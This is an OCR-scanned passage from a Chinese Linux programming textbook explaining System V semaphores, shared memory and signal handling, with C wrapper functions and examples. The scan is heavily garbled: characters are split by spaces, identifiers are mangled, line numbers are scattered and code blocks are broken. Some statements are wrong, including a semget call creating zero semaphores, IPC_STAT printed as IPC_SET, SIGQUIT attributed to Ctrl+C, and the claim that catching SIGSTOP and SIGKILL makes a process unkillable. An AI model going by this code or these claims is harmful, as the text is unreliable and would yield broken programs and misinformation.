是 一 种 计数 器 ， 用 来 控制 对 多 个 进程 共享 的 资源 所 进行 的 访问 。 它 们 常常 被 用 
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做 一 个 锁 机 制 ， 在 某 个 进程 正在 对 特定 资源 进行 操作 时 ， 信 号 量 可 以 防止 另 一 个 进程 去 访 
问 它 。 生 产 者 和 消费 者 的 模型 是 信号 量 的 典型 使 用 。 

本 节 将 介绍 信号 量 的 概念 和 常用 的 函数 ， 并 对 信号 量 进行 包装 形成 一 整套 用 户 可 以 理 
解 的 信号 量 函数 

1. 信号 量 数据 结构 

信号 量 数据 结构 是 信号 量程 序 设 计 中 经 常 使 用 的 数据 结构 ， 由 于 在 之 后 的 函数 中 经 常 


用 到 ， 这 里 将 结构 的 原型 列 出 来 ， 便 于 读者 查找 。 
union semun { /* 信 号 量 操作 的 联合 结构 */ 
int val; /* 整 型 变量 */ 
struct semid ds *buf; /*semid_ds 结构 指针 */ 
unsigned short *array; /* 数 组 类 型 */ 
struct seminfo * buf; /* 信 号 量 内 部 结构 */ 


}; 


2. 新 建 信号 量 函 数 semget() 

semget(O 函 数 用 于 创建 一 个 新 的 信号 量 集 合 ， 或 者 访问 现 有 的 集合 。 其 原型 如 下 ， 其 
中 第 1 个 参数 key 是 ftok 生成 的 键 值 ， 第 2 个 参数 nsems 参数 可 以 指定 在 新 的 集合 中 应 该 
创建 的 信号 量 的 数目 ， 第 3 个 参数 semflsg 是 打开 信号 量 的 方式 。 


#include <sys/types.h> 

#include <sys/ipc.h> 

#include <sys/sem.h> 

int semget (key t key, int nsems, int semflg); 


semflsg 是 打开 信号 量 的 方式 。 
口 
口 


IPC_CREAT: 如 果 内 核 中 不 存在 这 样 的 信号 量 集合 ， 则 把 它 创建 出 来 。 
IPC_EXCL: 当 与 IPC_CREAT 一 起 使 用 时 ， 如 果 信 和 号 量 集合 早已 存在 ， 则 操作 将 
失败 。 如 果 单 独 使 用 IPC_CREAT，semget() 或 者 返回 新 创建 的 信号 量 集合 的 信和 号 
量 集合 标识 符 ， 或 者 返回 早已 存在 的 具有 同一 个 关键 字 值 的 集合 的 标识 符 。 如 果 
同时 使 用 IPC_EXCL 和 IPC_CREAT, 那么 将 有 两 种 可 能 的 结果 : 如 果 集 合 不 存在 
则 创建 一 个 新 的 集合 ， 如 果 集 合 早已 存在 ， 则 调用 失败 ， 并 返回 一 1。IPC_EXCL 
本 身 是 没有 什么 用 处 的 , 但 当 与 IPC_CREAT 组 合 使 用 时 , 它 可 以 用 于 防止 为 了 访 
问 而 打开 现 有 的 信号 量 集合 。 


利用 semget(O) 函 数 包 装 建立 信号 量 的 代码 如 下 : 

typedef int sem 七 7 

union semun { /* 信 和 号 量 操作 的 联合 结构 */ 
int val; /* 整 型 变量 */ 
struct semid ds *buf; /*semid_ds 结构 指针 */ 
unsigned short *array; /* 数 组 类 型 */ 

} arg; /* 定 义 一 个 全 局 变量 *#/ 


Sem t CreateSem(key t key, int value) 


{ 


/* 建 立信 号 量 , 魔 数 key 和 信号 量 的 初始 值 value*/ 


ws 


第 1 篇 Linux 网 络 开发 基础 


union semun sem; /* 信 号 量 结构 变量 */ 
sem t semid; /* 信 号 量 ID*/ 
sem.val = value; /* 设 置 初始 值 */ 
semid = semget (key,0,IPC CREAT|0666) ; /* 获 得 信号 量 的 ID*/ 
if (-1 == semid) /* 获 得 信号 量 ID 失败 */ 
{ 

printf ("create semaphore error\n");/* 打 印信 息 */ 

return -1; /* 返 回 错误 */ 
} 
semct1 (semid,0,SETVAL, sem) ; /* 发 送 命 令 , 建 立 value 个 初始 值 的 信号 量 */ 
return semid; /* 返 回 建立 的 信号 量 */ 


} 
CreateSem() 函 数 按照 用 户 的 键 值 生成 一 个 信号 量 ， 把 信号 量 的 初始 值 设 为 用 户 输入 的 


value。 
3. 信号 量 操作 函数 semop() 


信号 量 的 P、YV 操作 是 通过 向 已 经 建立 好 的 信号 量 《〈 使 用 semget(O) 函 数 )， 发 送 命令 来 
完成 的 。 向 信和 号 量 发 送 命令 的 函数 是 semop()， 这 个 函数 的 原型 如 下 : 


#include <sys/types.h> 

#include <sys/ipc.h> 

#include <sys/sem.h> 

int semop (int semid, struct sembuf *sops, unsigned nsops); 

semop() 函 数 第 2 个 参数 (sops) 是 一 个 指针 ， 指 向 将 要 在 信号 量 集 合 上 执行 操作 的 一 
个 数组 , 而 第 3 i a 参数 指向 的 是 类 型 为 sembuf 
结构 的 一 个 数组 。sembuf 结构 是 在 linux/sem.h 中 定义 的 ， 如 下 所 示 。 


struct sembuf{ 


ushort sem num; /* 信 号 量 的 编号 */ 
short sem op; /* 信 号 量 的 操作 */ 
short sem flg; /* 信 号 量 的 操作 标志 */ 


}; 


口 sem_num: 用 户 要 处 理 的 信号 量 的 编号 。 

口 sem_op: 将 要 执行 的 操作 ( 正 、 负 ， 或 者 零 ) 。 

口 sem_flg: 信号 量 操作 的 标志 。 如 果 sem_op 为 负 ， 则 从 信和 号 量 中 减 掉 一 个 值 。 如 果 
sem_op 2 则 从 信号 量 中 加 上 值 。 如 果 sem_op 为 0, 则 将 进程 设置 为 睡眠 状态 ， 
直到 信号 量 的 值 为 0 为 止 。 

例如 “struct sembuf sem={0，+1，NOWAIT}; ”表示 对 信号 量 0， 进 行 加 1 的 操作 。 

函数 semop() 可 以 构建 基本 的 P、V 操作 , 代码 如 下 所 示 。Sem_P 构建 {0, +1, NOWAIT} 
内 sembuf 结构 来 进行 增加 1 个 信号 量 值 的 操作 ，Sem_V 构建 {0，-1，NOWAIT} 的 sembuf 
结构 来 进行 减少 1 个 信号 量 的 操作 ， 所 对 应 的 信号 量 由 函数 传 入 (semid)。 


int Sem Pl(sem t semid) /* 增 加 信号 量 */ 
i 
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struct sembuf sops={0,+1,IPC NOWAIT}; /* 建 立信 号 量 结构 值 */ 
return (semop(semid, &sops,1)); /* 发 送 命令 +/ 
人 Sem V(sem t semid) /* 减 小 信号 量 值 */ 
struct sembuf sops={0,-1,IPC NOWAIT}; /*# 建 立信 号 量 结构 值 */ 
return (semop(semid,&sops,1)); /*#* 发 送信 号 量 操作 方法 */ 
} 


4. 控制 信号 量 参数 semctl() 函 数 


与 文件 操作 的 ioctl0) 函 数 类 似 , 信号 量 的 其 他 操作 是 通过 函数 smectl(0) 来 完成 的 。 函 数 
semctl() 的 原型 如 下 : 


#include <sys/types.h> 

#include <sys/ipc.h> 

#include <sys/sem.h> 

int semctl(int semid, int semnum, int cmd, ...); 

函数 smctl0 用 于 在 信号 量 集合 上 执行 控制 操作 。 这 个 调用 类 似 于 函数 msgctl0, msgct10 
函数 是 用 于 消息 队列 上 的 操作 。semectI0 函 数 的 第 1 个 参数 是 关键 字 的 值 〈 在 我 们 的 例子 中 
它 是 调用 semget0 函 数 所 返回 的 值 )。 第 2 个 参数 (semun) 是 将 要 执行 操作 的 信号 量 的 编 
号 ， 它 是 信号 量 集合 的 一 个 索引 值 ， 对 于 集合 中 的 第 1 个 信号 量 ( 有 可 能 只 有 这 一 个 信号 
量 ) 来 说 ， 它 的 索引 值 将 是 一 个 为 0 的 值 。cmd 参数 代表 将 要 在 集合 上 执行 的 命令 。 其 取 


值 如 下 所 述 。 
口 IPC_STAT: 获取 某 个 集合 的 semid_ds 结构 ， 并 把 它 存储 在 semun 联合 体 的 buf 
参数 所 指定 的 地 址 中 。 


口 IPC_ SET: 设置 某 个 集合 的 semid_ds 结构 的 ipc_perm 成 员 的 值 。 该 命令 所 取 的 值 
是 从 semun 联合 体 的 buf 参数 中 取 到 的 。 


口 IPC_RMID: 从 内 核 删 除 该 集合 。 

口 GETALL: 用 于 获取 集合 中 所 有 信号 量 的 值 。 整 数值 存放 在 无 符号 短 整数 的 一 个 
数组 中 ， 该 数组 由 联合 体 的 array 成 员 所 指定 。 

口 GETNCNT: 返回 当前 正在 等 待 资源 的 进程 的 数目 。 

口 GETPID: 返回 最 后 一 次 执行 semop 调用 的 进程 的 PID。 

口 GETVAL: 返回 集合 中 某 个 信号 量 的 值 。 

口 GETZCNT: 返回 正在 等 待 资源 利用 率 达 到 百分之百 的 进程 的 数目 。 

口 SETALL: 把 集合 中 所 有 信号 量 的 值 ， 设 置 为 联合 体 的 array 成 员 所 包含 的 对 应 值 。 

口 SETVAL: 把 集合 中 单个 信号 量 的 值 设置 为 联合 体 的 val 成 员 的 值 。 


参数 arg 代表 类 型 semun 的 一 个 实例 。 这 个 特殊 的 联合 体 是 在 Linux/sem.h 中 定义 的 ， 
如 下 所 示 。 
口 val: 当 执 行 SETVAL 命令 时 将 用 到 这 个 成 员 , 它 用 于 指定 要 把 信号 量 设置 成 什么 值 。 
口 buf: 在 命令 IPC_STAT/IPC_SET 中 使 用 。 它 代表 内 核 中 所 使 用 的 内 部 信号 量 数据 
结构 的 一 个 复制 。 


we Ms 
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口 array: 用 在 GETALL/SETALL 命令 中 的 一 个 指针 。 它 应 当 指 向 整数 值 的 一 个 数组 。 
在 设置 或 获取 集合 中 所 有 信和 号 量 的 值 的 过 程 中 ， 将 会 用 到 该 数组 。 

口 剩 下 的 参数 buf 和 _pad 将 在 内 核 中 的 信号 量 代码 的 内 部 使 用 ， 对 于 应 用 程序 开发 
人 员 来 说 ， 它 们 用 处 很 少 ， 或 者 说 没有 用 处 。 这 两 个 参数 是 Linux 操作 系统 所 特 
有 的 ， 在 其 他 的 UNIX 实现 中 没有 。 

利用 semctl() 函 数 设置 和 获得 信号 量 的 值 构 建 通用 的 函数 : 


void SetvalueSem(sem t semid, int value) /# 设 置信 号 量 的 值 */ 

{ 
union semun sem; /* 信 号 量 操作 的 结构 */ 
sem.val = value; /* 值 初始 化 */ 
semctl (semid,0,SETVAL, sem); /* 设 置信 号 量 的 值 */ 

} 

int GetvalueSem(sem t semid) /# 获 得 信号 量 的 值 */ 

{ 
union semun sem; /* 信 号 量 操作 的 结构 */ 
return semctl (semid,0,GETVAL ,sem); /* 获 得 信号 量 的 值 */ 


} 


SetvalueSem() 函 数 设 置信 号 量 的 值 ， 它 是 通过 SETVAL 命令 实现 的 ， 所 设置 的 值 通过 
联合 变量 sem 的 val 域 实现 。GetvalueSem() 函 数 用 于 获得 信号 量 的 值 ，semct0 函 数 的 命令 
GETVAL 会 使 其 返回 给 定 信号 量 的 当前 值 。 当 然 ， 销 毁 信 号 量 同 样 可 以 使 用 semctl() 函 数 
实现 。 


void DestroySem(sem t semid) /* 销 毁 信 号 量 */ 

{ 
union semun sem; /* 信 号 量 操作 的 结构 */ 
sem.val = 0; /* 信 号 量 值 的 初始 化 */ 
semct1 (semid,0,IPC RMID,sem); /* 设 置信 号 量 *#/ 


} 

命令 IPC_RMID 将 给 定 的 信号 量 销毁 。 

5. 一 个 信号 量 操作 的 例子 

在 之 前 的 信号 量 函数 的 基础 上 ， 进 行 了 单 进程 的 信号 量程 序 模拟 。 下 面 的 代码 先 建立 
一 个 信号 量 ， 然 后 对 这 个 信号 量 进行 P、V 操作 ， 并 将 信号 量 的 值 打印 出 来 ， 最 后 销毁 信 
号 量 。 


01 int main(void) 


D2 

03 key t key; /* 信 号 量 的 键 值 */ 

04 int semid; /* 信 号 量 的 ID*/ 

05 char i; 

06 int value = 0; 

07 

08 key = ftok("/ipc/sem",'a'); /* 建 立信 号 量 的 键 值 */ 
09 

10 semid = CreateSem (key,100); /* 建 立信 号 量 */ 


a 
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I Eor (3 = 0 <= 3274) /* 对 信号 量 进行 3 次 增 减 操作 */ 
hl Sem P(semid); /* 增 加 信号 量 */ 

13 Sem V(semid); /* 减 小 信号 量 */ 

14 下 

25 value = GetvalueSem(semid) /* 获 得 信号 量 的 值 */ 

16 printf ("信号 量 值 为 :$d\n", value); /* 打 印 结果 */ 

Ly 

18 DestroySem(semid); /* 销 毁 信 号 量 */ 

19 return 0; 

20 } 


4.3.6 ”共享 内 存 


共享 内 存 是 在 多 个 进程 之 间 共 享 内 存 区 域 的 一 种 进程 间 的 通信 方式 ， 它 是 在 多 个 进程 
之 间 对 内 存 段 进 行 映射 的 方式 实现 内 存 共享 的 。 这 是 IPC 最 快捷 的 方式 ， 因 为 共享 内 存 方 
式 的 通信 没有 中 间 过 程 , 而 管道 、 消息 队列 等 方式 则 是 需要 将 数据 通过 中 间 机 制 进 行 转换 ; 
与 此 相反 ， 共 享 内 存 方式 直接 将 某 段 内 存 段 进行 映射 ， 多 个 进程 间 的 共享 内 存 是 同一 块 的 
物理 空间 ， 仅 仅 是 地 址 不 同 而 已 ， 因 此 不 需要 进行 复制 ， 可 以 直接 使 用 此 段 空间 。 


1. 创建 共享 内 存 函数 shmget() 


函数 shmget0 用 于 创建 一 个 新 的 共享 内 存 段 ， 或 者 访问 一 个 现 有 的 共享 内 存 段 ， 它 与 
消息 队列 ， 以 及 信和 号 量 集合 对 应 的 函数 十 分 相似 。 函 数 shmgetO 的 原型 如 下 : 

#include <sys/ipc.h> 

#include <sys/shm.h> 

int shmget (key t key, size t size, int shmflg); 

shmget() 的 第 一 个 参数 是 关键 字 的 值 。 然 后 ， 这 个 值 将 与 内 核 中 现 有 的 其 他 共享 内 存 
段 的 关键 字 值 相 比 较 。 在 比较 之 后 ， 打 开 和 访问 操作 都 将 依赖 于 shmflg 参数 的 内 容 。 

口 IPC_CREAT: 如 果 在 内 核 中 不 存在 该 内 存 段 ， 则 创建 它 。 

口 IPC_EXCL: 当 与 IPC_CREAT 一 起 使 用 时 ， 如 果 该 内 存 段 早已 存在 ， 则 此 次 调 

如 果 只 使 用 IPC_CREAT，shmget() 或 者 将 返回 新 创建 的 内 存 段 的 段 标识 符 ， 或 者 返 巴 
早已 存在 于 内 核 中 的 具有 相同 关键 字 值 的 内 存 段 的 标识 符 。 如 果 同 时 使 用 IPC_CREAT 和 
IPC_EXCL， 则 可 能 会 有 两 种 结果 : 如 果 该 内 存 段 不 存在 ， 则 将 创建 一 个 新 的 内 存 段 ， 妇 
果 内 存 段 早已 存在 ， 则 此 次 调用 失败 ， 并 将 返回 一 1。IPC_EXCL 本 身 是 没有 什么 用 处 的 ， 
但 在 与 IPC_CREAT 组 合 使 用 时 ， 它 可 用 于 防止 一 个 现 有 的 内 存 段 为 了 访问 而 打开 着 。 一 
旦 进程 获得 了 给 定 内 存 段 的 合法 IPC 标识 符 ， 它 的 下 一 步 操作 就 是 连接 该 内 存 段 ， 或 者 把 
该 内 存 段 映射 到 自己 的 寻 址 空间 中 。 


2. 获得 共享 内 存 地 址 函数 shmat() 


函数 shmat0 用 来 获取 共享 内 存 的 地 址 ,获取 共享 内 存 成 功 后 ,可 以 像 使 用 通用 内 存 一 
样 对 其 进行 读 写 操作 。 函 数 的 原型 如 下 : 


#include <sys/types.h> 
#include <sys/shm.h> 
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void *shmat (int shmid, const void *shmaddr，int shmf1g) 
int shmdt (Const void *shmaddr); 


如 果 shmaddr 参数 值 等 于 0， 则 内 核 将 试 着 查找 一 个 未 映射 的 区 域 。 用 户 可 以 指定 一 
个 地 址 ， 但 通常 该 地 址 只 用 于 访问 所 拥有 的 硬件 ， 或 者 解决 与 其 他 应 用 程序 的 冲突 。 
SHM_RND 标志 可 以 与 标志 参数 进行 OR 操作 ， 结 果 再 置 为 标志 参数 ， 这 样 可 以 让 传送 的 
地 址 页 对 齐 ( 舍 入 到 最 相近 的 页 面 大 小 )。 

此 外 ， 如 果 把 SHM_RDONLY 标志 与 标志 参数 进行 OR 操作 ， 结 果 再 置 为 标志 参数 
这 样 映射 的 共享 内 存 段 只 能 标记 为 只 读 方 式 。 

当 申 请 成 功 时 ， 对 共享 内 存 的 操作 与 一 般 内 存 一 样 ， 可 以 直接 进行 写 入 和 读 出 ， 以 及 
偏 移 的 操作 。 


3. 删除 共享 内 存 函数 shmdt() 
函数 shmdtO 用 于 删除 一 段 共享 内 存 。 函 数 的 原型 如 下 : 


#include <sys/types.h> 

#include <sys/shm.h> 

int shmdt (const void *shmaddr); 

当 某 进程 不 再 需要 一 个 共享 内 存 段 时 ， 它 必须 调用 这 个 函数 来 断 开 与 该 内 存 段 的 连 
接 。 正 如 前 面 所 介绍 的 那样 ， 这 与 从 内 核 删 除 内 存 段 是 两 回 事 。 在 成 功 完成 了 断 开 连 接 操 
作 以 后 ， 相 关 的 shmid ds 结构 的 shm_nattch 成 员 的 值 将 减 去 1。 如 果 这 个 值 减 到 0， 则 内 
核 将 真正 删除 该 内 存 段 。 


.共享 内 存 控制 函数 shmctl() 


共享 内 存 的 控制 函数 shmctl() 的 使 用 类 似 ioctl0) 的 方式 对 共享 内 存 进行 操作 : 向 共享 内 
存 的 句柄 发 送 命令 来 完成 某 种 功能 。 函 数 shmctl0) 的 原型 如 下 ， 其 中 shmid 是 共享 内 存 的 
句柄 ，cmd 是 向 共享 内 存 发 送 的 命令 , 最 后 一 个 参数 buf 则 是 向 共享 内 存 发 送 命令 的 参数 。 


#include <sys/ipc.h> 
#include <sys/shm.h> 
int shmctl(int shmid, int cmd, struct shmid ds *buf); 


结构 shmid_ds 结构 定义 如 下 : 


struct shmid ds { 
struct ipc perm ”shm perm;  /* 所 有 者 和 权限 */ 


size t shm_segsz; /* 段 大 小 ,以 字 节 为 单位 */ 
time t shm atime; /* 最 后 挂 接 时 间 */ 
time t shm dtime; /* 最 后 取出 时 间 */ 
time t shm ctime; /* 最 后 修改 时 间 */ 
Padit shm_cpid; ”/* 建立 者 的 PID */ 
Pid 七 shm lpid; 
/* 最 后 调用 函数 shmat () /shmdt () 的 PID*/ 


shmatt t shm_nattch; /* 现在 挂 接 的 数量 */ 
0 
此 函数 与 消息 队列 的 msgctl0 函 数 调 用 是 完全 类 似 的 ， 它 的 合法 命令 值 是 如 下 所 述 。 
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IPC_SET: 获取 内 存 段 的 shmid ds 结构 ， 并 把 它 存储 在 buf 参数 所 指定 的 地 址 中 。 
IPC_SET 设置 内 存 段 shmid_ds 结构 的 ipc_perm 成 员 的 值 ， 此 命令 是 从 buf 参数 中 
获得 该 值 的 。 

IPC_RMID: 标记 某 内 存 段 , 以 备 删 除 。 该 命令 并 不 真正 地 把 内 存 段 从 内 存 中 删除 。 
相反 ， 它 只 是 标记 上 该 内 存 段 ， 以 备 将 来 删除 。 只 有 当前 连接 到 该 内 存 段 的 最 后 
一 个 进程 正确 地 断 开 了 与 它 的 连接 ， 实 际 的 删除 操作 才 会 发 生 。 当 然 ， 如 果 当 前 
没有 进程 与 该 内 存 段 相连 接 ， 则 删除 将 立刻 发 生 。 为 了 正确 地 断 开 与 其 共享 内 存 
段 的 连接 ， 进 程 需要 调用 shmdt() 函 数 。 


一 个 共享 内 存 的 例子 


下 面 的 代码 在 父 进 程 和 子 进程 之 间 利用 共享 内 存 进行 通信 ， 父 进程 向 共享 内 存 中 写 入 


子 进 程 读 出 数据 。 两 个 进程 之 间 的 控制 采用 了 信号 量 的 方法 ， 父 进程 写 入 数据 成 功 


后 ， 信 号 量 加 1， 子 进程 在 访问 信号 量 之 前 先 等 待 信号 。 


01 
02 
03 
04 
05 
06 
0 
08 
09 
10 
下 二 
是 这 
13 
14 
15 
16 
hy 


18 
9 


#include <stdio.h> 
#include <sys/shm.h> 
#include <sys/ipc.h> 
#include <string.h> 
static char msg[]=" 你 好 ,共享 内 存 \n"; 
int main (void) 
{ 
key t key; 
int semid,shmid; 
char i,*shms,*shmc; 
struct semid ds buf; 
int value = 0; 
char buffer[80]; 


Pid t p; 

key = ftok("/ipc/sem",'a'); /* 生 成 键 值 */ 

shmid = shmget (key,1024,IPC CREAT|0604); ”/* 获 得 共享 内 存 , 大 小 为 

1024 个 字 节 */ 

semid = CreateSem (key, 0); /* 建 立信 号 量 */ 

p = fork(); /* 分 叉 程序 */ 

EPE 0) /* 父 进程 */ 

{ 
shms = (char *)shmat (shmid,0,0); /* 挂 接 共享 内 存 */ 
memcpy (shms, msg, strlen (msg)+1); /* 复 制 内 容 */ 
sleep (10); /* 等 待 10s, 另 一 个 进程 将 数据 读 出 */ 
Sem P (semid); /* 获 得 共享 内 存 的 信号 量 */ 
shmdt (shms) ; /* 摘 除 共享 内 存 */ 
DestroySem(semid); /x* 销 毁 信号 量 */ 

于 

else if(p == 0) /* 子 进程 */ 

{ 
shmc = (char *)shmat (shmid,0,0); /* 挂 接 共享 内 存 */ 
Sem V(semid); /* 减 小 信号 量 */ 
printf (" 共 享 内 存 的 值 为 :ss\n", shmc) /* 打 印信 息 */ 
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shmdt (shmc) ; /* 摘 除 共享 内 存 */ 


} 


return 0; 


信号 


信号 (signal) 机 制 是 UNIX 系统 中 最 为 古老 的 进程 之 间 的 通信 机 制 。 它 用 于 在 一 个 或 
多 个 进程 之 间 传 递 异 步 信 号 。 信 号 可 以 由 各 种 异步 事件 产生 ， 例 如 键盘 中 断 等 。Shell 也 可 
以 使 用 信号 将 作业 控制 命令 传递 给 它 的 子 进程 。 

Linux 系统 中 定义 了 一 系列 的 信号 ， 这 些 信 号 可 以 由 内 核 产 生 ， 也 可 以 由 系统 中 的 其 
他 进程 产生 ， 只 要 这 些 进 程 有 足够 的 权限 。 可 以 使 用 kill 命令 〈kill -D) 在 机 器 上 列 出 所 有 


的 信号 ， 


如 下 所 示 : 


六 


下 

6) 
a) 
16) 
2 
26) 
31) 
38) 


SIGHUP 2) 
SIGABRT 7) 
SIGSEGV 12) 
SIGSTKFLT 
SIGTTIN 22) 
SIGVTALRM 
SIGSYS 34) 
SIGRTMIN+4 


SIGRTMIN+8 


43) 


SIGRTMIN+9 


SIGRTMIN+13 
48) SIGRTMIN+14 49) SIGRTMIN+15 50) SIGRTMAX-14 51) SIGRTMAX-13 52) 
SIGRTMAX-12 
53) SIGRTMAX-11 54) SIGRTMAX-10 55) SIGRTMAX-9 56) SIGRTMAX-8 57) 
SIGRTMAX-7 
58) SIGRTMAX-6 59) SIGRTMAX-5 60) SIGRTMAX-4 61) SIGRTMAX-3 62) 
SIGRTMAX-2 
63) SIGRTMAX-1 64) SIGRTMAX 


进程 可 


SIGINT 3) SIGQUIT 4) SIGILL 5) SIGTRAP 

SIGBUS 8) SIGFPE 9) SIGKILL 10) SIGUSR1 

SIGUSR2 13) SIGPIPE 14) SIGALRM 15) SIGTERM 

17) SIGCHLD 18) SIGCONT 19) SIGSTOP 20) SIGTSTP 

SIGTTOU 23) SIGURG 24) SIGXCPU 25) SIGXFSZ 

27) SIGPROF 28) SIGWINCH 29) SIGIO 30) SIGPWR 
SIGRTMIN 35) SIGRTMIN+1 36) SIGRTMIN+2 37) SIGRTMIN+3 
39) SIGRTMIN+5 40) SIGRTMIN+6 41) SIGRTMIN+7 42) 


44) SIGRTMIN+10 45) SIGRTMIN+11 46) SIGRTMIN+12 47) 


以 屏蔽 掉 大 多 数 的 信号 ， 除 了 SIGSTOP 和 SIGKILL。SIGSTOP 信号 使 一 个 正 


在 运行 的 进程 暂停 ， 而 信号 SIGKILL 则 使 正在 运行 的 进程 退出 。 进 程 可 以 选择 系统 的 默认 
方式 处 理 信 号 ， 也 可 以 选择 自己 的 方式 处 理 产 生 的 信号 。 信 和 号 之 间 不 存在 相对 的 优先 权 ， 
系统 也 无 法 处 理 同 时 产生 的 多 个 同 种 的 信号 ， 也 就 是 说 ， 进 程 不 能 分 辨 它 收 到 的 是 1 个 或 

者 是 42 个 SIGCONT 信号 。 

SIGABRT: 调用 abort0 函 数 时 产生 此 信号 ， 进 程 异常 终止。 

SIGALRM: 超过 用 alarm() 函 数 设置 的 时 间 时 产生 此 信和 号 。 

SIGBUS: 指示 一 个 实现 定义 的 硬件 故障 。 

SIGCHLD: 在 一 个 进程 终止 或 停止 时 ，SIGCHLD 信号 被 送 给 其 父 进程 。 如 果 希 
望 从 父 进 程 中 了 解 其 子 进程 的 状态 改变 ， 则 应 捕捉 此 信号 。 信 和 号 捕捉 函数 中 通常 
要 调用 wait() 函 数 以 取得 子 进程 ID 和 其 终止 状态 。 

SIGCONT: 此 作业 控制 信号 送 给 需要 继续 运行 的 处 于 停止 状态 的 进程 。 如 果 接 收 
到 此 信号 的 进程 处 于 停止 状态 ， 则 操作 系统 的 默认 动作 是 使 该 停止 的 进程 继续 运 
行 ， 否 则 默认 动作 是 忽略 此 信号 。 

SIGEMT: 指示 一 个 实现 定义 的 硬件 故障 。 


口 


口 
口 
口 
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口 SIGFPE: 此 信号 表示 一 个 算术 运算 异常 ， 例 如 除 以 0， 浮 点 溢出 等 。 

口 SIGHUP: 如 果 终 端 界面 检测 到 一 个 连接 断 开 ， 则 将 此 信号 送 给 与 该 终端 相关 的 
进程 。 

SIGILL: 此 信号 指示 进程 已 执行 一 条 非法 硬件 指令 。 

SIGINT: 当 用 户 按 中 断 键 (一 般 采 用 Delete 或 Ctrl+C) 时 ， 终 端 驱动 程序 产生 这 
个 信号 并 将 信号 送 给 前 台 进 程 组 中 的 每 一 个 进程 。 当 一 个 进程 在 运行 时 失控 ， 特 
别 是 它 正 在 屏幕 上 产生 大 量 不 需要 的 输出 时 ， 常 用 此 信号 终止 它 。 

口 SIGIO: 此 信号 指示 一 个 异步 IO 事件 。 

口 SIGIOT: 这 指示 一 个 实现 定义 的 硬件 故障 。 

口 SIGPIPE: 如 果 在 读 进程 时 已 终止 写 管道 ， 则 产生 此 信和 号。 

口 SIGQUIT: 当 用 户 在 终端 上 按 退 出 键 〈 一 般 采 用 Ctrl+C) 时 ， 产 生 此 信号 ， 并 送 
至 前 台 进 程 组 中 的 所 有 进程 。 

SIGSEGV: 指示 进程 进行 了 一 次 无 效 的 存储 访问 。 

SIGSTOP: 这 是 一 个 作业 控制 信号 ， 它 停止 一 个 进程 。 

SIGSYS: 指示 一 个 无 效 的 系统 调用 。 由 于 某 种 未 知 原因 ， 某 个 进程 执行 了 一 条 系 
统 调 用 命令 ， 但 是 调用 命令 所 用 的 参数 无 效 。 

口 SIGTERM: 这 是 由 kill 命令 发 送 的 系统 默认 终止 信号 。 

口 SIGTRAP: 指示 一 个 实现 定义 的 硬件 故障 。 

口 SIGTSTP: 交互 停止 信号 ， 当 用 户 在 终端 上 按 挂 起 键 〈 一 般 采 用 Ctrl+Z) 时 ， 终 


口 口 口 


端 驱动 程序 产生 此 信号 。 
口 SIGTTIN， 当 一 个 后 台 进 程 组 进程 试图 读 其 控制 终端 时 ， 终 端 驱动 程序 产生 此 
信号 。 


口 SIGTTOU: 当 一 个 后 台 进 程 组 进程 试图 写 其 控制 终端 时 产生 此 信号 。 

口 SIGURG: 此 信号 通知 进程 已 经 发 生 一 个 紧急 情况 。 在 网 络 连接 上 ， 接 到 非 规 定 波 
特 率 的 数据 时 ， 此 信号 可 选择 地 产生 。 

口 SIGUSR1: 这 是 一 个 用 户 定义 的 信号 ， 可 用 于 应 用 程序 。 

口 SIGUSR2: 这 是 一 个 用 户 定义 的 信号 ， 可 用 于 应 用 程序 。 


1. 信号 截取 函数 signal() 
signal0 函 数 用 于 截取 系统 的 信号 ， 对 此 信号 挂 接 用 户 自己 的 处 理 函 数 。 其 原型 如 下 : 


#include <signal.h> 
typedef void (*sighandler t) (int); 
sighandler t signall(int signum, sighandler t handler); 


signal() 函 数 的 原型 说 明 此 函数 要 求 两 个 参数 ， 返 回 一 个 函数 指针 ， 而 该 指针 所 指向 的 
函数 无 返回 值 (void)。 第 1 个 参数 signo 是 一 个 整 型 数 ， 第 2 个 参数 是 函数 指针 ， 它 所 指 
向 的 函数 需要 一 个 整 型 参数 ， 无 返回 值 。 用 一 般 语言 来 描述 就 是 要 向 信号 处 理 程 序 传送 一 
个 整 型 参数 ， 而 它 却 无 返回 值 。 当 调用 signal 设置 信号 处 理 程序 时 ， 第 2 个 参数 是 指向 该 
函数 〈 也 就 是 信号 处 理 程序 ) 的 指针 。signal 的 返回 值 指向 以 前 信号 处 理 程序 的 指针 。 

如 下 代码 截取 了 系统 的 信号 SIGSTOP 和 SIGKILL， 用 命令 kill 杀 死 其 是 不 可 能 的 。 


01 #include <signal.h> 
02 #include <stdio.h> 
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03 typedef void (*sighandler t) (int) 
static void sig handle (int signo) 


04 
05 
06 
07 
08 
09 
10 
P 
下 2 
13 
14 
二 3 
16 
hy 
18 
19 
20 
21 
22 
人 3 
24 
5 
26 
wd 
28 
29 
30 
31 
32 
33 
34 
35 
36 
37 
38 
39 
40 


{ 


if( SIGSTOP== signo) 


printf ("接收 到 信号 SIGSTOP\n"); 
2 if(SIGKILL==signo) 
Printf(" 接 收 到 信号 SIGKILL\n"); 
2 
printf ("接收 到 信号 :%d\n", signo); 


return; 

main (void) 

sighandler t ret; 

ret = signal (SIGSTOP, sig handle); 


if(SIG ERR == ret) 
{ 


/* 信 号 处 理 函 数 */ 
/* 为 SIGSTOP 信号 */ 
/* 打 印信 息 */ 

/* 为 SIGKILL 信号 */ 
/* 打 印信 息 */ 

/* 其 他 信号 */ 

/* 打 印信 息 */ 


/* 挂 接 SIGSTOP 信号 处 理 函 数 */ 
/* 挂 接 失败 */ 


printf ("为 SIGSTOP 挂 接 信号 处 理 函 数 失败 \n") ; 


return -1; 


} 


ret = signal (SIGKILL, sig handle); 
if(SIG ERR == ret) 
{ 


/* 返 回 */ 


/* 挂 接 SIGKILL 处 理 函数 */ 
/* 挂 接 失败 */ 


printf ("为 SIGKILL 挂 接 信号 处 理 函 数 失败 \n") ; 


return -1; 


; 


for (77) 7 


2. 向 进程 发 送信 号 函数 kill() 和 raise() 


在 挂 接 信号 处 理 函 数 后 ， 可 以 等 待 系统 信号 的 到 来 。 同 时 ， 用 户 可 以 自己 构建 信号 发 
送 到 目标 进程 中 。 此 类 函数 有 kill0 和 raise() 函 数 ， 函 数 的 原型 如 下 : 

#include <sys/types.h> 

#include <signal.h> 

int kill (pid t pid, int sig); 

int raise(int sig); 


kill0) 函 数 向 进程 号 为 pid 的 进程 发 送信 号 ， 


/* 返 回 */ 


/* 等 待 程序 退出 */ 


信号 值 为 sig。 当 pid 为 0 时， 向 当前 系统 


